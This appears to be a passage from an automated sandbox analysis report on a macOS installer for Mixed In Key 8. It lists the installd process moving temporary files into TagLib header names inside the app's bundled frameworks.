Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4sfElD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/synchronizedlyricsframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_5whTvd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tbytevectorstream.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_EZpTcL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tdebug.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_FizdJQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xmfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_DZiGOW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/trueaudiofile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_AAoKkK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tutils.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1bsNr0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asftag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_D4ZVIk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xmproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_93W6fe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/infotag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ynOADn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/speexproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_psXC92 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xiphcomment.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_tcgV8w -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_5AqXFQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/vorbisfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eGPGs9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tstringlist.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_egVWoh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/commentsframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4lJ4zG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggpage.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_FqjRod -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Q720nd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/fileref.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_d3NGLQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tpropertymap.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_cTUBdZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tfilestream.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_cGuskV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4fgIFD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/unicode.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_P4YWAS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/popularimeterframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zxdiwF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/taglib_export.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_lKQxlz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/vorbisproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_vZLnxf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/speexfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_6XBUuq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apefooter.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_tL2euY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2synchdata.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_AqwRCT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/rifffile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_wi9Mtm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/relativevolumeframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_a5pzG1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/privateframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_kMtX0U -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4tag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bN1XbU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/opusproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_iWaP6V -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4coverart.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_HlHTM9 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/eventtimingcodesframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_gQNfZi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/chapterframe.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bJjidk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/itfile.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_7Ce1EU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavproperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4W3rGF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mpegheader.h	Jump to behavior
